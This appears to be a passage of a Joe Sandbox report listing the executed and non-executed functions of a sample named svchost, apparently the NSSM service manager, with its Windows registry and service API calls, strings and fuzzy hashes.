GetLastError.KERNEL32(00000000,?,0040C1D6,?,00000000,AppEnvironment,?,?), ref: 0040ABBD

Strings

get_environment(), xrefs: 0040AC55

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ErrorLastQueryValue
String ID: get_environment()
API String ID: 1349404517-3013924771
Opcode ID: 5fe43cc991a531061349832457c459933e1ba32819d714f4fa0c8be67a97d6b9
Instruction ID: 1d8989cfc65caa848716c5f45015e9ce7db8ed1eb8c61d39c0da8540bf3f80e9
Opcode Fuzzy Hash: 5fe43cc991a531061349832457c459933e1ba32819d714f4fa0c8be67a97d6b9
Instruction Fuzzy Hash: 2541A1F26043006BE3109B55EC45FA777ACEB8471AF20457EF645E72C1D6B9D440CA66

Function 0040A9C0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__snwprintf_s.LIBCMT ref: 0040A9FA

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,00020006,00000000,?,?,?,?,?,?,?,00000000), ref: 0040AA5D
GetLastError.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040AA69

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

create_exit_action(), xrefs: 0040AA08
AppExit, xrefs: 0040A9E3, 0040AB0C
SYSTEM\CurrentControlSet\Services\%s\Parameters\%s, xrefs: 0040A9E9
NSSM_REG_EXIT, xrefs: 0040AA0D

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$CreateDeregisterErrorLastRegisterReport__snwprintf_s__vsnwprintf_s_l
String ID: AppExit$NSSM_REG_EXIT$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$create_exit_action()
API String ID: 508490100-4149098550
Opcode ID: 4fcb7e5af628b31a412a967c9f9c41a1b2acc9b1253a557f1fea2d54328a6c8b
Instruction ID: c54e0a44a042602298dc2c5b83e2bd5604e14107d9abb35974e2f0600bad2026
Opcode Fuzzy Hash: 4fcb7e5af628b31a412a967c9f9c41a1b2acc9b1253a557f1fea2d54328a6c8b
Instruction Fuzzy Hash: FB4109F1B443006BE6209754CD4BFEB7398DB98704F50452EF64AAA1C2EAB8D544CB9B

Function 0040B310 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 90
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__snwprintf_s.LIBCMT ref: 0040B349

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

__snwprintf_s.LIBCMT ref: 0040B365
RegCreateKeyExW.KERNELBASE(80000002,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 0040B3CA
GetLastError.KERNEL32(00000000), ref: 0040B3D6
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,?), ref: 0040B41F

Strings

SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 0040B354
NSSM_REGISTRY, xrefs: 0040B378
SYSTEM\CurrentControlSet\Services\%s\Parameters\%s, xrefs: 0040B338
open_registry(), xrefs: 0040B373

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: __snwprintf_s$CreateErrorLastOpen__vsnwprintf_s_l
String ID: NSSM_REGISTRY$SYSTEM\CurrentControlSet\Services\%s\Parameters$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$open_registry()
API String ID: 3162672713-2180615361
Opcode ID: 694e5b5481d173b3ab35a74997d032020c8674ed162b4220796c0d16fe997546
Instruction ID: 51ad032d09eab74b91555c8713cdb19e4fcc5e6d9908cd399ce7877185dd2446
Opcode Fuzzy Hash: 694e5b5481d173b3ab35a74997d032020c8674ed162b4220796c0d16fe997546
Instruction Fuzzy Hash: 3221E6F0A443016FE220F760CD47FBB3398EB54704F90452E7659E61C2FAB8954086AA

Function 0040B5D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 113
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0040B310: __snwprintf_s.LIBCMT ref: 0040B349

RegQueryValueExW.KERNELBASE(00000000,?,00000000,?,?,?), ref: 0040B65F
RegCloseKey.ADVAPI32(00000000), ref: 0040B66A

Strings

%lu, xrefs: 0040B69B
AppExit, xrefs: 0040B5FC

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: CloseQueryValue__snwprintf_s
String ID: %lu$AppExit
API String ID: 2736435911-2506947422
Opcode ID: 360aecef11bcee73e09b5d0cd0e78933fc472dd2aa08b67d38fa45625f26d4c0
Instruction ID: c411b45a6930565bb1268b54e23c5314efaf1e743d4ddd058092e23d946cddcd
Opcode Fuzzy Hash: 360aecef11bcee73e09b5d0cd0e78933fc472dd2aa08b67d38fa45625f26d4c0
Instruction Fuzzy Hash: 4E31B2726043046BD300DB25DC41AAFB7E8EFC8314F84492EFA5992281FB7AD5458BDA

Function 0040B240 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExW.KERNELBASE ref: 0040B280
__snwprintf_s.LIBCMT ref: 0040B2A9

Part of subcall function 00412731: __vsnwprintf_s_l.LIBCMT ref: 00412748

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

GetLastError.KERNEL32(00000000), ref: 0040B2CA

Strings

%lu, xrefs: 0040B29B

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterErrorLastQueryRegisterReportValue__snwprintf_s__vsnwprintf_s_l
String ID: %lu
API String ID: 2741730872-685833217
Opcode ID: a4297ff40bdac13b64ecd610264a5552e878824a3cab828616055258fe2716c0
Instruction ID: 9b57c4e92f1354976d5d0f2d51147bf8e68e588caea2cac463da8bdf8903c173
Opcode Fuzzy Hash: a4297ff40bdac13b64ecd610264a5552e878824a3cab828616055258fe2716c0
Instruction Fuzzy Hash: 911190B1504300AFD210DB55DC4AFAFB7E8EB8D718F40492DF649A6281D674E944CBAB

Function 00405400 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Strings

nssm, xrefs: 00405404

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$DeregisterRegisterReport
String ID: nssm
API String ID: 3235303502-2602286837
Opcode ID: 6fec7ebd8c18dbc7d464e686865d7787e4c472b10a666eaa8ba60e55d3e0cda1
Instruction ID: d3648bf1d166a2bd8de7c6c9c4a863b798114447eb191853c28b7c632e5ffc8e
Opcode Fuzzy Hash: 6fec7ebd8c18dbc7d464e686865d7787e4c472b10a666eaa8ba60e55d3e0cda1
Instruction Fuzzy Hash: D8F0A4B0505711ABE714DB04DC19BFBBBA5EF88705F40842CF542EA2C0D774D9418F9A

Function 00409920 Relevance: 4.5, APIs: 3, Instructions: 43
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

AllocateAndInitializeSid.ADVAPI32(?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409969
CheckTokenMembership.KERNELBASE(00000000,?,0042340D,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040997E
FreeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00409989

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 628fba0404b7c400409226c91e7c1594c4cf8dc2a312d52cc7af963d2352c708
Instruction ID: 72e0c7922e14d595f5e3848571bc75bc3c4e4abfa34b06bfca4019b358322d7e
Opcode Fuzzy Hash: 628fba0404b7c400409226c91e7c1594c4cf8dc2a312d52cc7af963d2352c708
Instruction Fuzzy Hash: 4501A77134C380BFD301DB649985A6BBFD8AB99700FC4985EF58583242D174D408C76B

Function 00401A30 Relevance: 4.5, APIs: 3, Instructions: 29
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F5), ref: 00401A35
FillConsoleOutputAttribute.KERNELBASE(00000000,000000C0,?,?,?), ref: 00401A62
FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401A72

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ConsoleFillOutput$AttributeCharacterHandle
String ID:
API String ID: 3042536769-0
Opcode ID: 95c137ac06ca406579a6d85467d849bb65a0f3e508194bdda109f111fce98bd0
Instruction ID: 77fbf6a8a0b04aca51523caecfdb8986c69d7abe1881f4de13a62e1bdab06c50
Opcode Fuzzy Hash: 95c137ac06ca406579a6d85467d849bb65a0f3e508194bdda109f111fce98bd0
Instruction Fuzzy Hash: A2E01CB500A216BAE210DF50ED48EDBB7ACEF89B54F004A59F16593160E3709945C7BB

Function 00401AD0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5), ref: 00401AD5
FillConsoleOutputAttribute.KERNELBASE(00000000,00000000,?,?,?), ref: 00401AFF
FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401B0F

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ConsoleFillOutput$AttributeCharacterHandle
String ID:
API String ID: 3042536769-0
Opcode ID: dd09dcd497fea648322d313fa1981f7ecff786c9414ae34b4543ece9a9281358
Instruction ID: 3d5203a324c54e0c1a2c141d7bb79ef220f5eecb49d30cd12f98b3b48fc8e675
Opcode Fuzzy Hash: dd09dcd497fea648322d313fa1981f7ecff786c9414ae34b4543ece9a9281358
Instruction Fuzzy Hash: ECE08CB5009202BAD200DF40ED48EDBB7ACEF88B50F004948F16482160E330880487BB

Function 00401A80 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5), ref: 00401A85
FillConsoleOutputAttribute.KERNELBASE(00000000,00000040,?,?,?), ref: 00401AAF
FillConsoleOutputCharacterW.KERNELBASE(00000000,00000020,?,?,?,?,?,?), ref: 00401ABF

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ConsoleFillOutput$AttributeCharacterHandle
String ID:
API String ID: 3042536769-0
Opcode ID: 93abe4eb89c4456a5bac7811860cf9eb8417963c086c90116b55cb21d40498a7
Instruction ID: 6df11741ffc9c133aa2f1d23af60f207f574fc6f7eed3b9c725f422df81f401a
Opcode Fuzzy Hash: 93abe4eb89c4456a5bac7811860cf9eb8417963c086c90116b55cb21d40498a7
Instruction Fuzzy Hash: C9E08CB5009202BAD200DF40ED48EDBB7ACEF88B50F004948F26492160E330880487BB

Function 0040AF80 Relevance: 3.1, APIs: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,?,?,00000000), ref: 0040AFAD

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 538a7e2e593c2b1df26199a27f16ff88f02e39c7db606f20f98d7ca63f0cf366
Instruction ID: 597d436d122071fde7b142eaa2d3e4324275d01078404c93b01c3c5b25e8dfd8
Opcode Fuzzy Hash: 538a7e2e593c2b1df26199a27f16ff88f02e39c7db606f20f98d7ca63f0cf366
Instruction Fuzzy Hash: 8F01B5F7D043116BD710EA68EC45BCB7B98ABD4725F44853AF589E3281E238C948C7A3

Function 00409F50 Relevance: 3.0, APIs: 2, Instructions: 37timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNELBASE(?,?,?,?,?), ref: 00409F6C
GetLastError.KERNEL32(00000000), ref: 00409F77

Part of subcall function 004052C0: TlsGetValue.KERNEL32(00000014,?,00401042,00000000,00000000), ref: 004052C7
Part of subcall function 004052C0: LocalAlloc.KERNEL32(00000040,0000FFFF,?,00401042,00000000,00000000), ref: 004052DA

Part of subcall function 00405400: RegisterEventSourceW.ADVAPI32(00000000,nssm), ref: 0040540B
Part of subcall function 00405400: ReportEventW.ADVAPI32(00000000,?,00000000), ref: 00405459
Part of subcall function 00405400: DeregisterEventSource.ADVAPI32(00000000), ref: 00405460

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Event$Source$AllocDeregisterErrorLastLocalProcessRegisterReportTimesValue
String ID:
API String ID: 2954018415-0
Opcode ID: 05161e89971d5f04a25216144698213b570e3291b45edcb44d12a17e94977250
Instruction ID: bc366b3cbda322b824c9a217db56cc4eac1f60e122c8c735dcd73177c2023d54
Opcode Fuzzy Hash: 05161e89971d5f04a25216144698213b570e3291b45edcb44d12a17e94977250
Instruction Fuzzy Hash: 55F096F6904300BBE700E7A1DC45EEB73ACABC830CF84892DF559D2142F579D64487A6

Function 00418B0C Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00418B21

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: d1f5c1f7ff6ca3e210c9ff08d4e84c7b89227a1fab85292e36c71b5e85367a71
Instruction ID: 6fb3f13a5da9b15824ab22e1f0bcca622450086d227712405257e67a9503346b
Opcode Fuzzy Hash: d1f5c1f7ff6ca3e210c9ff08d4e84c7b89227a1fab85292e36c71b5e85367a71
Instruction Fuzzy Hash: 09D05E72B94304AADB109F75BD08B623BECD784396F00843AB90CC6150E678DA81DA08

Non-executed Functions

Function 0040CAB0 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 203memoryserviceCOMMON

Download Yara Rule

APIs

OpenServiceW.ADVAPI32(?,?,?,?,00000000,00000000,77735E70), ref: 0040CAEF
GetServiceDisplayNameW.ADVAPI32 ref: 0040CB17
GetServiceKeyNameW.ADVAPI32(?,?,?,?), ref: 0040CB34
GetLastError.KERNEL32 ref: 0040CB47
GetLastError.KERNEL32 ref: 0040CB50
EnumServicesStatusW.ADVAPI32 ref: 0040CB9D
GetLastError.KERNEL32 ref: 0040CBA3
GetProcessHeap.KERNEL32(00000000,0000003B), ref: 0040CBB7
HeapAlloc.KERNEL32(00000000), ref: 0040CBBE
EnumServicesStatusW.ADVAPI32(?,0000003B,00000003,00000000,00000003,?,0000003B,?), ref: 0040CC1A
GetLastError.KERNEL32 ref: 0040CC2A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040CC75
HeapFree.KERNEL32(00000000), ref: 0040CC7C
GetLastError.KERNEL32 ref: 0040CC82
__snwprintf_s.LIBCMT ref: 0040CCB4
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CCC3
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040CCCA
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 0040CCDF
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 0040CCE6

Strings

ENUM_SERVICE_STATUS, xrefs: 0040CBCF
open_service(), xrefs: 0040CBCA, 0040CCD0
canonical_name, xrefs: 0040CCD5

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: Heap$ErrorLast$Process$FreeService$EnumNameServicesStatus$AllocDisplayOpen__snwprintf_s
String ID: ENUM_SERVICE_STATUS$canonical_name$open_service()
API String ID: 2597093351-3687008758
Opcode ID: a873ba07c5b4005c15c99fbe001417df42881820b5864b2ce8b4ed45134739af
Instruction ID: f503188999ee140625c6406a49f341195e14fe3366045b110030180a16826972
Opcode Fuzzy Hash: a873ba07c5b4005c15c99fbe001417df42881820b5864b2ce8b4ed45134739af
Instruction Fuzzy Hash: 51618AB1904301EBD710DB55DC85FAFB7E8EBD8704F104A2EF959A3280D778E9058B6A

Function 0040FA10 Relevance: 10.6, APIs: 7, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90058403c9df6f6ed3b87d35343112d852bc14fd61586e00f88080c2bcc3e524
Instruction ID: f9580fb1e3cb4435e98f8377f0ae24c04a26ce3602f05662924e3990e25ac85f
Opcode Fuzzy Hash: 90058403c9df6f6ed3b87d35343112d852bc14fd61586e00f88080c2bcc3e524
Instruction Fuzzy Hash: 6F21F7F2A406087BE6207765BC4AFDB375CDB88319F00403AF609E5182E779E8454A68

Function 00412CDC Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00416877
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041688C
UnhandledExceptionFilter.KERNEL32(0041F0D8), ref: 00416897
GetCurrentProcess.KERNEL32(C0000409), ref: 004168B3
TerminateProcess.KERNEL32(00000000), ref: 004168BA

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_svchost.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f01314061c3818e20305920116d866878eb5042cc5ccecfbecbbfc2216c79b6f
Instruction ID: 714c231b98a53905c4c0fced0f636a606c023e921e8ea544abea05735bda33fc
Opcode Fuzzy Hash: f01314061c3818e20305920116d866878eb5042cc5ccecfbecbbfc2216c79b6f
Instruction Fuzzy Hash: B921C5F5A01304AFCB31DF54E9456847BB8FB98302F90817AE51987360E7B89A868F4D

Function 0040CE10 Relevance: 80.9, APIs: 39, Strings: 7, Instructions: 394memoryregistryserviceCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\ServiceGroupOrder,00000000,00020019,?), ref: 0040CEED
GetLastError.KERNEL32 ref: 0040CEF7
_fwprintf.LIBCMT ref: 0040CF1A

Part of subcall function 00405470: _vfwprintf.LIBCMT ref: 0040548F
Part of subcall function 00405470: LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 00405498

ChangeServiceConfigW.ADVAPI32(?,000000FF,000000FF,000000FF,00000000,00000000,00000000,0041E5D8,00000000,00000000,00000000,00000000,?,00000000,?), ref: 0040D225
GetProcessHeap.KERNEL32(00000000,0041E5D8), ref: 0040D239
HeapFree.KERNEL32(00000000), ref: 0040D240
GetLastError.KERNEL32 ref: 0040D246
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040D27A
HeapFree.KERNEL32(00000000), ref: 0040D283
GetProcessHeap.KERNEL32(00000000,?), ref: 0040D290
HeapFree.KERNEL32(00000000), ref: 0040D293
CloseServiceHandle.ADVAPI32(?), ref: 0040D29A
_fwprintf.LIBCMT ref: 0040D2BD

Part of subcall function 0040CA70: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,?,00401B82,?,?,?,00000001), ref: 0040CA7C

Strings

%s: %s, xrefs: 0040D108, 0040D2AF
%s\%s: %s, xrefs: 0040CFD0, 0040D02A
groups, xrefs: 0040CF72
%s: %s, xrefs: 0040CF0C
SYSTEM\CurrentControlSet\Control\ServiceGroupOrder, xrefs: 0040CEE3, 0040CF07, 0040CFCB, 0040D025
List, xrefs: 0040CF44, 0040CFA6, 0040CFC6, 0040D020
set_service_dependencies(), xrefs: 0040CF6D

Memory Dump Source

Source File: 00000009.00000002.2581252616.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2581215729.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581310154.000000000041D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581369894.0000000000422000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.2581412869.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File

